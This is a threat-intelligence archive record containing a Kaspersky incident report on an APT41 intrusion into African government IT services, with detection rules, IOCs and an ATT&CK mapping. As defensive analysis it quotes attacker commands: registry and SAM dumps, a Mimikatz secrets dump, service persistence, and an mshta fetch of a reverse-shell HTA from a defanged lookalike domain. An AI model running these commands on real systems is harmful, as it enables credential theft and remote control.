{
	"id": "a3299aea-2e08-492c-a6d7-b31607e83ab4",
	"created_at": "2026-04-06T00:15:42.201941Z",
	"updated_at": "2026-04-10T03:32:21.469098Z",
	"deleted_at": null,
	"sha1_hash": "25d53c88b04f5a5155c19e9c1d76ddebca29a1f3",
	"title": "The SOC files: Rumble in the jungle or APT41’s new target in Africa",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1025306,
	"plain_text": "The SOC files: Rumble in the jungle or APT41’s new target in\r\nAfrica\r\nBy Denis Kulik\r\nPublished: 2025-07-21 · Archived: 2026-04-05 13:38:21 UTC\r\nIntroduction\r\nSome time ago, Kaspersky MDR analysts detected a targeted attack against government IT services in the African\r\nregion. The attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within\r\ntheir malware. One of the C2s was a captive SharePoint server within the victim’s infrastructure.\r\nDuring our incident analysis, we were able to determine that the threat actor behind the activity was APT41 (aka\r\nWicked Panda, Brass Typhoon, Barium or Winnti). This is a Chinese-speaking cyberespionage group known for\r\ntargeting organizations across multiple sectors, including telecom and energy providers, educational institutions,\r\nhealthcare organizations and IT energy companies in at least 42 countries. It’s worth noting that, prior to the\r\nincident, Africa had experienced the least activity from this APT.\r\nDetection\r\nOur MDR team identified suspicious activity on several workstations within an organization’s infrastructure.\r\nThese were typical alerts indicating the use of the WmiExec module from the Impacket toolkit. 
Specifically, the\r\nalerts showed the following signs of the activity:\r\nA process chain of svchost.exe ➔exe ➔ cmd.exe\r\nThe output of executed commands being written to a file on an administrative network share, with the file\r\nname consisting of numbers separated by dots:\r\nWmiExec process tree\r\nhttps://securelist.com/apt41-in-africa/116986/\r\nPage 1 of 25\n\nThe attackers also leveraged the Atexec module from the Impacket toolkit.\r\nScheduler tasks created by Atexec\r\nThe attackers used these commands to check the availability of their C2 server, both directly over the internet and\r\nthrough an internal proxy server within the organization.\r\nThe source of the suspicious activity turned out to be an unmonitored host that had been compromised. Impacket\r\nwas executed on it in the context of a service account. We would later get that host connected to our telemetry to\r\npinpoint the source of the infection.\r\nAfter the Atexec and WmiExec modules finished running, the attackers temporarily suspended their operations.\r\nPrivilege escalation and lateral movement\r\nAfter a brief lull, the attackers sprang back into action. This time, they were probing for running processes and\r\noccupied ports:\r\ncmd.exe /c netstat -ano \u003e C:\\Windows\\temp\\temp_log.log\r\ncmd.exe /c tasklist /v \u003e C:\\Windows\\temp\\temp_log.log\r\nThey were likely trying to figure out if the target hosts had any security solutions installed, such as EDR, MDR or\r\nXDR agents, host administration tools, and so on.\r\nAdditionally, the attackers used the built-in reg.exe utility to dump the SYSTEM and SAM registry hives.\r\ncmd.exe /c reg save HKLM\\SAM C:\\Windows\\temp\\temp_3.log\r\ncmd.exe /c reg save HKLM\\SYSTEM C:\\Windows\\temp\\temp_4.log\r\nOn workstations connected to our monitoring systems, our security solution blocked the activity, which resulted in\r\nan empty dump file. 
However, some hosts within the organization were not secured. As a result, the attackers\r\nsuccessfully harvested credentials from critical registry hives and leveraged them in their subsequent attacks. This\r\nunderscores a crucial point: to detect incidents promptly and minimize damage, security solution agents must be\r\ninstalled on all workstations across the organization without exception. Furthermore, the more comprehensive\r\nyour telemetry data, the more effective your response will be. It’s also crucial to keep a close eye on the\r\npermissions assigned to service and user accounts, making sure no one ends up with more access rights than they\r\nreally need. This is especially true for accounts that exist across multiple hosts in your infrastructure.\r\nIn the incident we’re describing here, two domain accounts obtained from a registry dump were leveraged for\r\nlateral movement: a domain account with local administrator rights on all workstations, and a backup solution\r\naccount with domain administrator privileges. The local administrator privileges allowed the attackers to use the\r\nSMB protocol to transfer tools for communicating with the C2 to the administrative network share C$. We will\r\ndiscuss these tools – namely Cobalt Strike and a custom agent – in the next section.\r\nIn most cases, the attackers placed their malicious tools in the C:\\WINDOWS\\TASKS\\ directory on target hosts,\r\nbut they used other paths too:\r\nc:\\windows\\tasks\\\r\nc:\\programdata\\\r\nc:\\programdata\\usoshared\\\r\nc:\\users\\public\\downloads\\\r\nc:\\users\\public\\\r\nc:\\windows\\help\\help\\\r\nc:\\users\\public\\videos\\\r\nFiles from these directories were then executed remotely using the WMI toolkit:\r\nLateral movement via privileged accounts\r\nC2 communication\r\nCobalt Strike\r\nThe attackers used Cobalt Strike for C2 communication on compromised hosts. 
They distributed the tool as an\r\nencrypted file, typically with a TXT or INI extension. To decrypt it, they employed a malicious library injected\r\ninto a legitimate application via DLL sideloading.\r\nHere’s a general overview of how Cobalt Strike was launched:\r\nAttackers placed all the required files – the legitimate application, the malicious DLL, and the payload file – in\r\none of the following directories:\r\nC:\\Users\\Public\\\r\nC:\\Users\\{redacted}\\Downloads\\\r\nC:\\Windows\\Tasks\\\r\nThe malicious library was a legitimate DLL modified to search for an encrypted Cobalt Strike payload in a\r\nspecifically named file located in the same directory. Consequently, the names of the payload files varied\r\ndepending on what was hardcoded into the malicious DLL.\r\nDuring the attack, the threat actor used the following versions of modified DLLs and their corresponding\r\npayloads:\r\nLegitimate file name DLL Encrypted Cobalt Strike\r\nTmPfw.exe TmDbg64.dll TmPfw.ini\r\ncookie_exporter.exe msedge.dll Logs.txt\r\nFixSfp64.exe log.dll Logs.txt\r\n360DeskAna64.exe WTSAPI32.dll config.ini\r\nKcInst.exe KcInst32.dll kcinst.log\r\nMpCmdRunq.exe mpclient.dll Logs.txt\r\nDespite using various legitimate applications to launch Cobalt Strike, the payload decryption process was similar\r\nacross instances. Let’s take a closer look at one example of Cobalt Strike execution, using the legitimate file\r\ncookie_exporter.exe, which is part of Microsoft Edge. When launched, this application loads msedge.dll,\r\nassuming it’s in the same directory.\r\nThe attackers renamed cookie_exporter.exe to Edge.exe and replaced msedge.dll with their own malicious\r\nlibrary of the same name.\r\nWhen any dynamic library is loaded, the DllEntryPoint function is executed first. 
In the modified DLL, this\r\nfunction included a check for a debugging environment. Additionally, upon its initial execution, the library\r\nverified the language packs installed on the host. The malicious code would not run if it detected any of the\r\nfollowing language packs:\r\nJapanese (Japan)\r\nKorean (South Korea)\r\nChinese (Mainland China)\r\nChinese (Taiwan)\r\nIf the system passes the checks, the application that loaded the malicious library executes an exported DLL\r\nfunction containing the malicious code. Because different applications were used to launch the library in different\r\ncases, the exported functions vary depending on what the specific software calls. For example, with msedge.dll,\r\nthe malicious code was implemented in the ShowMessageWithString function, called by cookie_exporter.exe.\r\nThe ShowMessageWithString function retrieves its payload from Logs.txt, a file located in the same directory.\r\nThese filenames are typically hardcoded in the malicious dynamic link libraries we’ve observed.\r\nThe screenshot below shows a disassembled code segment responsible for loading the encrypted file. It clearly\r\nreveals the path where the application expects to find the file.\r\nThe payload is decrypted by repeatedly executing the following instructions using 128-bit SSE registers:\r\nOnce the payload is decrypted, the malicious executable code from msedge.dll launches it by using a standard\r\nmethod: it allocates a virtual memory region within its own process, then copies the code there and executes it by\r\ncreating a new thread. 
In other versions of similarly distributed Cobalt Strike agents that we examined, the\r\nmalicious code could also be launched by creating a new process or upon being injected into the memory of\r\nanother running process.\r\nBeyond the functionality described above, we also found a code segment within the malicious libraries that\r\nappeared to be a message to the analyst. These strings are supposed to be displayed if the DLL finds itself running\r\nin a debugger, but in practice this doesn’t occur.\r\nOnce Cobalt Strike successfully launches, the implant connects to its C2 server. Threat actors then establish\r\npersistence on the compromised host by creating a service with a command similar to this:\r\nC:\\Windows\\system32\\cmd.exe /C sc create \"server power\" binpath= \"cmd /c start\r\nC:\\Windows\\tasks\\Edge.exe\" \u0026\u0026 sc description \"server power\" \"description\" \u0026\u0026 sc config \"server\r\npower\" start= auto \u0026\u0026 net start \"server power\"\r\nAttackers often use the following service names for embedding Cobalt Strike:\r\nserver power\r\nWindowsUpdats\r\n7-zip Update\r\nAgent\r\nDuring our investigation, we uncovered a compromised SharePoint server that the attackers were using as the C2.\r\nThey distributed files named agents.exe and agentx.exe via the SMB protocol to communicate with the server.\r\nEach of these files is actually a C# Trojan whose primary function is to execute commands it receives from a web\r\nshell named CommandHandler.aspx, which is installed on the SharePoint server. The attackers uploaded\r\nmultiple versions of these agents to victim hosts. 
All versions had similar functionality and used a hardcoded URL\r\nto retrieve commands:\r\nThe agents executed commands from CommandHandler.aspx using the cmd.exe command shell launched with\r\nthe /c flag.\r\nWhile analyzing the agents, we didn’t find significant diversity in their core functionality, despite the attackers\r\nconstantly modifying the files. Most changes were minor, primarily aimed at evading detection. Outdated file\r\nversions were removed from the compromised hosts.\r\nThe attackers used the deployed agents to conduct reconnaissance and collect sensitive data, such as browser\r\nhistory, text files, configuration files, and documents with .doc, .docx and .xlsx extensions. They exfiltrated the\r\ndata back to the SharePoint server via the upload.ashx web shell.\r\nIt is worth noting that the attackers made some interesting mistakes while implementing the mechanism for\r\ncommunicating with the SharePoint server. Specifically, if the CommandHandler.aspx web shell on the server\r\nwas unavailable, the agent would attempt to execute the web page’s error message as a command:\r\nObtaining a command shell: reverse shell via an HTA file\r\nIf, after their initial reconnaissance, the attackers deemed an infected host valuable for further operations, they’d\r\ntry to establish an alternative command-shell access. To do this, they executed the following command to\r\ndownload from an external resource a malicious HTA file containing an embedded JavaScript script and run this\r\nfile:\r\n\"cmd.exe\" /c mshta hxxp[:]//github.githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta\r\nThe group attempted to mask their malicious activity by using resources that mimicked legitimate ones to\r\ndownload the HTA file. Specifically, the command above reached out to the GitHub-impersonating domain\r\ngithub[.]githubassets[.]net. 
The attackers primarily used the site to host JavaScript code. These scripts were\r\nresponsible for delivering either the next stage of their malware or the tools needed to further the attack.\r\nAt the time of our investigation, a harmless script was being downloaded from github[.]githubassets[.]net instead\r\nof a malicious one. This was likely done to hide the activity and complicate attack analysis.\r\nThe harmless script found on github[.]githubassets[.]net\r\nHowever, we were able to obtain and analyze previously distributed scripts, specifically the malicious file\r\n2CD15977B72D5D74FADEDFDE2CE8934F. Its primary purpose is to create a reverse shell on the host, giving\r\nthe attackers a shell for executing their commands.\r\nOnce launched, the script gathers initial host information:\r\nIt then connects to the C2 server, also located at github[.]githubassets[.]net, and transmits a unique ATTACK_ID\r\nalong with the initially collected data. The script leverages various connection methods, such as WebSockets,\r\nAJAX, and Flash. The choice depends on the capabilities available in the browser or execution environment.\r\nData collection\r\nNext, the attackers utilized automation tools such as stealers and credential-harvesting utilities to collect sensitive\r\ndata. We detail these tools below. Data gathered by these utilities was also exfiltrated via the compromised\r\nSharePoint server. In addition to the aforementioned web shell, the SMB protocol was used to upload data to the\r\nserver. The files were transferred to a network share on the SharePoint server.\r\nPillager\r\nA modified version of the Pillager utility stands out among the tools the attackers deployed on hosts to gather\r\nsensitive information. This tool is used to export and decrypt data from the target computer. 
The original Pillager\r\nversion is publicly available in a repository, accompanied by a description in Chinese.\r\nThe primary types of data collected by this utility include:\r\nSaved credentials from browsers, databases, and administrative utilities like MobaXterm\r\nProject source code\r\nScreenshots\r\nActive chat sessions and data\r\nEmail messages\r\nActive SSH and FTP sessions\r\nA list of software installed on the host\r\nOutput of the systeminfo and tasklist commands\r\nCredentials stored and used by the operating system, and Wi-Fi network credentials\r\nAccount information from chat apps, email clients, and other software\r\nA sample of data collected by Pillager:\r\nThe utility is typically an executable (EXE) file. However, the attackers rewrote the stealer’s code and compiled it\r\ninto a DLL named wmicodegen.dll. This code then runs on the host via DLL sideloading. They chose convert-moftoprovider.exe, an executable from the Microsoft SDK toolkit, as their victim application. It is normally used\r\nfor generating code from Managed Object Format (MOF) files.\r\nDespite modifying the code, the group didn’t change the stealer’s default output file name and path:\r\nC:\\Windows\\Temp\\Pillager.zip.\r\nIt’s worth noting that the malicious library they used was based on the legitimate SimpleHD.dll HDR rendering\r\nlibrary from the Xbox Development Kit. The source code for this library is available on GitHub. This code was\r\nmodified so that convert-moftoprovider.exe loaded an exported function, which implemented the Pillager code.\r\nInterestingly, the path to the PDB file, while appearing legitimate, differs by using PS5 instead of XBOX:\r\nCheckout\r\nThe second stealer the attackers employed was Checkout. 
In addition to saved credentials and browser history, it\r\nalso steals information about downloaded files and credit card data saved in the browser.\r\nWhen launching the stealer, the attackers pass it a j8 parameter; without it, the stealer won’t run. The malware\r\ncollects data into CSV files, which it then archives and saves as CheckOutData.zip in a specially created\r\ndirectory named CheckOut.\r\nData collection and archiving in Checkout\r\nCheckout launch diagram in Kaspersky Threat Intelligence Platform\r\nRawCopy\r\nBeyond standard methods for gathering registry dumps, such as using reg.exe, the attackers leveraged the publicly\r\navailable utility RawCopy (MD5 hash: 0x15D52149536526CE75302897EAF74694) to copy raw registry files.\r\nRawCopy is a command-line application that copies files from NTFS volumes using a low-level disk reading\r\nmethod.\r\nThe following commands were used to collect registry files:\r\nc:\\users\\public\\downloads\\RawCopy.exe /FileNamePath:C:\\Windows\\System32\\Config\\system\r\n/OutputPath:c:\\users\\public\\downloads\r\nc:\\users\\public\\downloads\\RawCopy.exe /FileNamePath:C:\\Windows\\System32\\Config\\sam\r\n/OutputPath:c:\\users\\public\\downloads\r\nc:\\users\\public\\downloads\\RawCopy.exe /FileNamePath:C:\\Windows\\System32\\Config\\security\r\n/OutputPath:c:\\users\\public\\downloads\r\nMimikatz\r\nThe attackers also used Mimikatz to dump account credentials. Like the Pillager stealer, Mimikatz was rewritten\r\nand compiled into a DLL. This DLL was then loaded by the legitimate java.exe file (used for compiling Java\r\ncode) via DLL sideloading. 
The following files were involved in launching Mimikatz:\r\nC:\\Windows\\Temp\\123.bat\r\nC:\\Windows\\Temp\\jli.dll\r\nC:\\Windows\\Temp\\java.exe\r\nC:\\Windows\\Temp\\config.ini\r\n123.bat is a BAT script containing commands to launch the legitimate java.exe executable, which in turn loads\r\nthe dynamic link library for DLL sideloading. This DLL then decrypts and executes the Mimikatz configuration\r\nfile, config.ini, which is distributed from a previously compromised host within the infrastructure.\r\njava.exe privilege::debug token::elevate lsadump::secrets exit\r\nRetrospective threat hunting\r\nAs already mentioned, the victim organization’s monitoring coverage was initially patchy. Because of this, in the\r\nearly stages, we only saw the external IP address of the initial source and couldn’t detect what was happening on\r\nthat host. After some time, the host was finally connected to our monitoring systems, and we found that it was an\r\nIIS web server. Furthermore, despite the lost time, it still contained artifacts of the attack.\r\nThese included the aforementioned Cobalt Strike implant located in c:\\programdata\\, along with a scheduler task\r\nfor establishing persistence on the system. Additionally, a web shell remained on the host, which our solutions\r\ndetected as HEUR:Backdoor.MSIL.WebShell.gen. This was found in the standard temporary directory for\r\ncompiled ASP.NET application files:\r\nc:\\windows\\microsoft.net\\framework64\\v4.0.30319\\temporary asp.net\r\nfiles\\root\\dedc22b8\\49ac6571\\app_web_hdmuushc.dll\r\nMD5: 0x70ECD788D47076C710BF19EA90AB000D\r\nThese temporary files are automatically generated and contain the ASPX page code:\r\nThe web shell was named newfile.aspx. The screenshot above shows its function names. 
Based on these names,\r\nwe were able to determine that this instance utilized a Neo-reGeorg web shell tunnel.\r\nThis tool is used to proxy traffic from an external network to an internal one via an externally accessible web\r\nserver. Thus, the launch of the Impacket tools, which we initially believed was originating from a host unidentified\r\nat the time (the IIS server), was in fact coming from the external network through this tunnel.\r\nAttribution\r\nWe attribute this attack to APT41 with a high degree of confidence, based on the similarities in the TTPs, tooling,\r\nand C2 infrastructure with other APT41 campaigns. In particular:\r\nThe attackers used a number of tools characteristic of APT41, such as Impacket, WMI, and Cobalt Strike.\r\nThe attackers employed DLL sideloading techniques.\r\nDuring the attack, various files were saved to C:\\Windows\\Temp.\r\nThe C2 domain names identified in this incident (s3-azure.com, *.ns1.s3-azure.com, *.ns2.s3-azure.com)\r\nare similar to domain names previously observed in APT41 attacks (us2[.]s3bucket-azure[.]online,\r\nstatus[.]s3cloud-azure[.]com).\r\nTakeaways and lessons learned\r\nThe attackers wield a wide array of both custom-built and publicly available tools. Specifically, they use\r\npenetration testing tools like Cobalt Strike at various stages of an attack. The attackers are quick to adapt to their\r\ntarget’s infrastructure, updating their malicious tools to account for specific characteristics. They can even\r\nleverage internal services for C2 communication and data exfiltration. 
The files discovered during the\r\ninvestigation indicate that the malicious actor modifies its techniques during an attack to conceal its activities – for\r\nexample, by rewriting executables and compiling them as DLLs for DLL sideloading.\r\nWhile this story ended relatively well – we ultimately managed to evict the attackers from the target organization’s\r\nsystems – it’s impossible to counter such sophisticated attacks without a comprehensive knowledge base and\r\ncontinuous monitoring of the entire infrastructure. For example, in the incident at hand, some assets weren’t\r\nconnected to monitoring systems, which prevented us from seeing the full picture immediately. It’s also crucial to\r\nmaintain maximum coverage of your infrastructure with security tools that can automatically block malicious\r\nactivity in the initial stages. Finally, we strongly advise against granting excessive privileges to accounts, and\r\nespecially against using such accounts on all hosts across the infrastructure.\r\nAppendix\r\nRules\r\nYara\r\nrule neoregeorg_aspx_web_shell\r\n{\r\n    meta:\r\n        description = \"Rule to detect neo-regeorg based ASPX web-shells\"\r\n        author = \"Kaspersky\"\r\n        copyright = \"Kaspersky\"\r\n        distribution = \"DISTRIBUTION IS FORBIDDEN. 
DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM\"\r\n    strings:\r\n        $func1 = \"FrameworkInitialize\" fullword\r\n        $func2 = \"GetTypeHashCode\" fullword\r\n        $func3 = \"ProcessRequest\" fullword\r\n        $func4 = \"__BuildControlTree\"\r\n        $func5 = \"__Render__control1\"\r\n        $str1 = \"FAIL\" nocase wide\r\n        $str2 = \"Port close\" nocase wide\r\n        $str3 = \"Port filtered\" nocase wide\r\n        $str4 = \"DISCONNECT\" nocase wide\r\n        $str5 = \"FORWARD\" nocase wide\r\n    condition:\r\n        uint16(0) == 0x5A4D and\r\n        filesize \u003c 400000 and\r\n        3 of ($func*) and\r\n        3 of ($str*)\r\n}\r\nSigma\r\ntitle: Service Image Path Start From CMD\r\nid: faf1e809-0067-4c6f-9bef-2471bd6d6278\r\nstatus: test\r\ndescription: Detects creation of unusual service executable starting from cmd /c using command line\r\nreferences:\r\n    - tbd\r\ntags:\r\n    - attack.persistence\r\n    - attack.T1543.003\r\nauthor: Kaspersky\r\ndate: 2025/05/15\r\nlogsource:\r\n    product: windows\r\n    service: security\r\ndetection:\r\n    selection:\r\n        EventID: 4697\r\n        ServiceFileName|contains:\r\n            - '%COMSPEC%'\r\n            - 'cmd'\r\n            - 'cmd.exe'\r\n        ServiceFileName|contains|all:\r\n            - '/c'\r\n            - 'start'\r\n    condition: selection\r\nfalsepositives:\r\n    - Legitimate\r\nlevel: medium\r\nIOCs\r\nFiles\r\n2F9D2D8C4F2C50CC4D2E156B9985E7CA\r\n9B4F0F94133650B19474AF6B5709E773\r\nA052536E671C513221F788DE2E62316C\r\n91D10C25497CADB7249D47AE8EC94766\r\nC3ED337E2891736DB6334A5F1D37DC0F\r\n9B00B6F93B70F09D8B35FA9A22B3CBA1\r\n15097A32B515D10AD6D793D2D820F2A8\r\nA236DCE873845BA4D3CCD8D5A4E1AEFD\r\n740D6EB97329944D82317849F9BBD633\r\nC7188C39B5C53ECBD3AEC77A856DDF0C\r\n3AF014DB9BE1A04E8B312B55D4479F69\r\n4708A2AE3A5F008C87E68ED04A081F18\r\n125B257520D16D759B112399C3CD1466\r\nC149252A0A3B1F5724FD76F704A1E0AF\r\n3021C9BCA4EF3AA672461ECADC4718E6\r\nF1025FCAD036AAD8BF124DF8C9650BBC\r\n100B463EFF8295BA617D3AD6DF5325C6\r\n2CD15977B72D5D74FADEDFDE2CE8934F\r\n9D53A0336ACFB9E4DF11162CCF7383A0\r\nDomains and IPs\r\n47.238.184[.]9\r\n38.175.195[.]13\r\nhxxp://github[.]githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta\r\nhxxp://chyedweeyaxkavyccenwjvqrsgvyj0o1y.oast[.]fun/aaa\r\nhxxp://toun[.]callback.red/aaa\r\nhxxp://asd.xkx3[.]callback.[]red\r\nhxxp[:]//ap-northeast-1.s3-azure[.]com\r\nhxxps[:]//www[.]msn-microsoft[.]org:2053\r\nhxxp[:]//www.upload-microsoft[.]com\r\ns3-azure.com\r\n*.ns1.s3-azure.com\r\n*.ns2.s3-azure.com\r\nupload-microsoft[.]com\r\nmsn-microsoft[.]org\r\nMITRE ATT\u0026CK\r\nTactic Technique ID\r\nInitial Access\r\nValid Accounts: Domain Accounts T1078.002\r\nExploit Public-Facing Application T1190\r\nExecution\r\nCommand and Scripting Interpreter: PowerShell T1059.001\r\nCommand and Scripting Interpreter: Windows Command Shell T1059.003\r\nScheduled Task/Job: Scheduled Task T1053.005\r\nWindows Management Instrumentation T1047\r\nPersistence\r\nCreate or Modify System Process: Windows Service T1543.003\r\nHijack Execution Flow: DLL Side-Loading T1574.002\r\nScheduled Task/Job: Scheduled Task T1053.005\r\nValid Accounts: Domain Accounts T1078.002\r\nWeb Shell T1505.003\r\nIIS Components T1505.004\r\nPrivilege Escalation\r\nCreate or Modify System Process: Windows Service T1543.003\r\nHijack Execution Flow: DLL Side-Loading T1574.002\r\nProcess Injection T1055\r\nScheduled Task/Job: Scheduled Task T1053.005\r\nValid Accounts: Domain Accounts T1078.002\r\nDefense Evasion\r\nHijack Execution Flow: DLL Side-Loading T1574.002\r\nDeobfuscate/Decode Files or Information T1140\r\nIndicator Removal: File Deletion T1070.004\r\nMasquerading T1036\r\nProcess Injection T1055\r\nCredential Access\r\nCredentials from Password Stores: Credentials from Web Browsers T1555.003\r\nOS Credential Dumping: Security Account Manager T1003.002\r\nUnsecured Credentials T1552\r\nDiscovery\r\nNetwork Service Discovery T1046\r\nProcess Discovery T1057\r\nSystem Information Discovery T1082\r\nSystem Network Configuration Discovery T1016\r\nLateral movement\r\nLateral Tool Transfer T1570\r\nRemote Services: SMB/Windows Admin Shares T1021.002\r\nCollection\r\nArchive Collected Data: Archive via Utility T1560.001\r\nAutomated Collection T1119\r\nData from Local System T1005\r\nCommand and Control\r\nApplication Layer Protocol: Web Protocols T1071.001\r\nApplication Layer Protocol: DNS T1071.004\r\nIngress Tool Transfer T1105\r\nProxy: Internal Proxy T1090.001\r\nProtocol Tunneling T1572\r\nExfiltration\r\nExfiltration Over Alternative Protocol T1048\r\nExfiltration Over Web Service T1567\r\nSource: https://securelist.com/apt41-in-africa/116986/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://securelist.com/apt41-in-africa/116986/"
	],
	"report_names": [
		"116986"
	],
	"threat_actors": [
		{
			"id": "49822165-5541-423d-8808-1c0a9448d588",
			"created_at": "2022-10-25T16:07:23.384093Z",
			"updated_at": "2026-04-10T02:00:04.575678Z",
			"deleted_at": null,
			"main_name": "Barium",
			"aliases": [
				"Brass Typhoon",
				"Pigfish",
				"Starchy Taurus"
			],
			"source_name": "ETDA:Barium",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Barlaiy",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Destroy RAT",
				"DestroyRAT",
				"Kaba",
				"Korplug",
				"POISONPLUG",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "945a572f-ebe3-4e2f-a288-512fe751cfa8",
			"created_at": "2022-10-25T16:07:24.413971Z",
			"updated_at": "2026-04-10T02:00:04.97924Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"G0044",
				"Leopard Typhoon",
				"Wicked Panda",
				"Winnti Group"
			],
			"source_name": "ETDA:Winnti Group",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"FunnySwitch",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434542,
	"ts_updated_at": 1775791941,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/25d53c88b04f5a5155c19e9c1d76ddebca29a1f3.pdf",
		"text": "https://archive.orkl.eu/25d53c88b04f5a5155c19e9c1d76ddebca29a1f3.txt",
		"img": "https://archive.orkl.eu/25d53c88b04f5a5155c19e9c1d76ddebca29a1f3.jpg"
	}
}